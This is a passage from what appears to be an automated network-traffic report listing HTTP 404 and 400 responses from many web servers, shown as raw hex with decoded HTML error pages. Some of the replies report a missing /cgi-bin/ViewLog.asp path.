            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Sun, 23 Oct 2022 15:57:46 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 15:57:26 GMTServer: Apache/2.4.6 (CentOS)Content-Length: 217Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 33 20 4f 63 74 20 32 30 32 32 20 31 35 3a 35 37 3a 32 36 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 36 20 28 43 65 6e 74 4f 53 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 32 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p></body></html>HTTP/1.1 400 Bad RequestDate: Sun, 23 Oct 2022 15:57:26 GMTServer: Apache/2.4.6 (CentOS)Content-Length: 226Connection: closeContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Sun, 23 Oct 2022 15:57:46 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 23 Oct 2022 15:57:46 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 15:57:48 GMTServer: ApacheContent-Length: 217Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-type: text/htmlContent-Length: 0Connection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 18:57:48 GMTServer: WebsX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-XSS-Protection: 1;mode=blockCache-Control: no-storeContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlCache-Control: private, no-cache, max-age=0Pragma: no-cacheContent-Encoding: gzipVary: Accept-EncodingContent-Length: 655Date: Sun, 23 Oct 2022 15:57:49 GMTServer: LiteSpeedConnection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 65 54 ef 6b db 30 10 fd 5e d8 ff 70 4d 19 6c 10 c7 76 ea b0 61 7b 86 b1 1f 6c 30 b6 42 0b 63 1f 65 eb 6c 8b 29 92 27 5d e2 64 7f fd 4e 4e 93 34 9d 05 8e 2c 9d de bd 7b ef a2 f2 fa e3 8f 0f 0f bf ee 3e 41 4f 6b 5d 5d 95 e1 07 3c ed 35 be 9b f5 a8 ba 9e f2 34 49 5e ce c2 16 0a 59 95 a4 48 63 05 59 92 c1 77 4b f0 d9 6e 8c 7c 71 55 c6 87 f5 32 9e a2 ae ca da ca fd 11 a7 b1 da ba 1c 6e b2 2c 2b 60 2d 5c a7 4c 9e 14 ad 35 94 83 b1 6e 2d 34 a4 d9 b0 8b 97 c9 b0 83 f7 4e 09 3d 87 2f a8 b7 48 aa 11 73 f0 c2 f8 c8 a3 53 6d 01 4f 28 15 50 8b e6 77 e7 02 81 e8 98 a2 6d db 22 70 95 6a fb ac 0a b1 21 cb d9 95 89 2e 30 66 15 84 e7 e9 01 c2 1d 45 42 ab ce e4 d0 a0 21 74 05 8c 4a 52 9f bf 4d 98 e1 b1 84 48 63 cb 05 44 d9 61 71 b0 5e 91 b2 26 17 b5 b7 7a 43 58 00 d9 21 87 db 90 65 0a 5d f1 8c b9 c1 e3 53 f6 e9 31 e3 49 13 08 a2 44 5e fd c5 3c 5d 4d b0 5a 19 3c 31 3e 2c 4d 31 e3 61 a9 b6 5a 32 28 bb c1 ca a7 c1 a4 e5 25 68 14 48 04 61 8b 33 34 73 e2 ef 59 75 e1 5f bf e4 d3 43 f5 d0 23 38 f4 76 e3 9a 30 f9 b3 41 4f 28 a1 b1 1b 2d d9 2c 82 1a 99 00 9f 01 6b 80 7a e5 81 9d d9 a2 bb 2e e3 81 01 62 d6 b1 7a 7c 3f 91 f4 60 cf 4d 9b 84 71 51 e5 92 99 3c 96 3f 39 34 08 29 95 e9 f2 d0 0a 81 26 1c 27 c5 49 60 87 5a 90 da 62 d1 68 14 8e 25 a0 be 38 7b 7a c2 9b 2a 8f d2 24 e5 95 ff 3a e5 26 7b 13 46 51 5b 27 d1 4d a1 c0 81 c0 d6 29 09 ae ab c5 ab 64 3e 8d 45 ba 7a cd 61 bb c8 f7 42 da 31 87 64 0a 4c 0e 41 cb d5 6a 0e e7 57 b2 b8 7d 0d ca 78 a4 a9 0b 6b 57 dd 71 56 a9 f7 dc 1e 23 3a 16 b2 de b3 f3 e2 b9 2e a1 6b a1 77 d8 72 bb 12 0d 79 1c 8f e3 b8 d0 8a d0 0f 88 92 b0 e9 17 8d 5d c7 e8 9c 75 d1 20 3a 9c 55 df 78 f7 3e ec c2 4f ac e1 7e 72 a1 8c 45 c5 26 de b1 30 1e 83 55 42 6e 95 e7 10 ea 05 c1 f9 c4 03 03 1a ce dd 29 f4 f0 d5 34 0b 60 23 83 bb 02 46 06 eb ad 27 36 81 5d 5f 0f c2 ec 41 18 39 07 c1 56 6f 9a 7e 0e bd 08 b1 bc 69 c8 59 0d 96 f3 4e 1f fc 57 79 de 1a 9c 70 11 1a e3 d8 17 e1 56 08 77 c4 74 d7 fc 03 27 dd f9 c5 7c 04 00 00 Data Ascii: eTk0^pMlva{l0Bcel)']dNN4,{>AOk]]<54I^YHcYwKn|qU2n,+`-\L5n-4N=/HsSmO(Pwm"pj!.0fEB!tJRMHcDaq^&zCX!e]S1ID^<]MZ<1>,M1aZ2(%hHa34sYu_C#8v0AO(-,kz.bz|?`MqQ<?94)&'I`Zbh%8{z*$:&{FQ['M)d>EzaB1dLAjW}xkWqV#:.kwry]u :Ux>O~rE&0UBn)4`#F'6]_A9Vo~iYNWypVwt'|
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 23 Oct 2022 15:57:51 GMTContent-Type: text/htmlContent-Length: 11939Connection: keep-aliveKeep-Alive: timeout=20Vary: Accept-EncodingETag: "5aff6d93-2ea3"
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 15:57:51 GMTContent-Type: application/json; charset=utf-8Connection: keep-aliveContent-Length: 48X-Kong-Response-Latency: 0Server: kong/2.0.4Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 22 6e 6f 20 52 6f 75 74 65 20 6d 61 74 63 68 65 64 20 77 69 74 68 20 74 68 6f 73 65 20 76 61 6c 75 65 73 22 7d Data Ascii: {"message":"no Route matched with those values"}
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1920Content-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETDate: Sun, 23 Oct 2022 15:57:51 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 44 69 65 20 53 65 69 74 65 20 77 75 72 64 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0d 0a 3c 53 54 59 4c 45 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 42 4f 44 59 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 31 20 7b 20 66 6f 6e 74 3a 20 31 33 70 74 2f 31 35 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 32 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 41 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 72 65 64 20 7d 0d 0a 20 20 41 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 6d 61 72 6f 6f 6e 20 7d 0d 0a 3c 2f 53 54 59 4c 45 3e 0d 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 54 41 42 4c 45 20 77 69 64 74 68 3d 35 30 30 20 62 6f 72 64 65 72 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 31 30 3e 3c 54 52 3e 3c 54 44 3e 0d 0a 0d 0a 3c 68 31 3e 44 69 65 20 53 65 69 74 65 20 77 75 72 64 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 3c 2f 68 31 3e 0d 0a 44 69 65 20 76 6f 6e 20 49 68 6e 65 6e 20 67 65 73 75 63 68 74 65 20 53 65 69 74 65 20 77 75 72 64 65 20 65 76 65 6e 74 75 65 6c 6c 20 65 6e 74 66 65 72 6e 74 2c 20 69 68 72 20 4e 61 6d 65 20 77 75 72 64 65 20 67 65 e4 6e 64 65 72 74 2c 20 6f 64 65 72 20 64 69 65 20 53 65 69 74 65 20 69 73 74 20 76 6f 72 fc 62 65 72 67 65 68 65 6e 64 20 6e 69 63 68 74 20 76 65 72 66 fc 67 62 61 72 2e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 56 65 72 73 75 63 68 65 6e 20 53 69 65 20 46 6f 6c 67 65 6e 64 65 73 3a 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c 69 3e 53 74 65 6c 6c 65 6e 20 53 69 65 20 73 69 63 68 65 72 2c 20 64 61 73 73 20 64 69 65 20 69 6e 20 64 65 72 20 41 64 72 65 73 73 7a 65 69 6c 65 20 64 65 73 20 42 72 6f 77 73 65 72 73 20 61 6e 67 65 7a 65 69 67 74 65 20 57 65 62 73 69 74 65 61 64 72 65 73 73 65 20 72 69 63 68 74 69 67 20 67 65 73 63 68 72 69 65 62 65 6e 20 75 6e 64 20 66 6f 72 6d 61 74 69 65 72 74 20 69 73 74 2e 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 57 65 6e 6e 20 53 69 65 20 64 69 65 73 65 20 53 65 69 74 65 20 fc 62 65 72 20 65 69 6e 65 6e 20 48 79 70 65 72 6c 69 6e 6b 20 65 72 72 65 69 63 68 74 20 68 61 62 65 6e 2c 20 74 65 69 6c 65 6e 20 53 69 65 20 64 65 6d 20 57 65 62 73 69 74 65 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 6d 69 74 2c 20 64
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Sun, 23 Oct 2022 15:57:51 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 23 Oct 2022 15:57:51 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Sun, 23 Oct 2022 15:57:53 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 